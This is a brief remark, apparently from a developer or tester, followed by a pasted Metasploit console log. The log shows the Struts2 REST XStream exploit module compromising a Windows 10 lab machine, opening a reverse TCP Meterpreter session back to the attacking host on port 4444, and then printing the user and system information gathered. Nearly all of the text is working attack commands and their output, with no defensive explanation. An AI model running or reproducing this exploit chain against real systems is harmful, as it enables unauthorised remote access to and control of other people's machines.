df5f4caaae
I'm full of shit. It works. msf5 exploit(multi/http/struts2_rest_xstream) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Powershell command length: 2467 [*] Sending stage (206403 bytes) to 192.168.56.101 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500 meterpreter > getuid Server username: MSEDGEWIN10\IEUser meterpreter > sysinfo Computer : MSEDGEWIN10 OS : Windows 10 (Build 17134). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 3 Meterpreter : x64/windows meterpreter >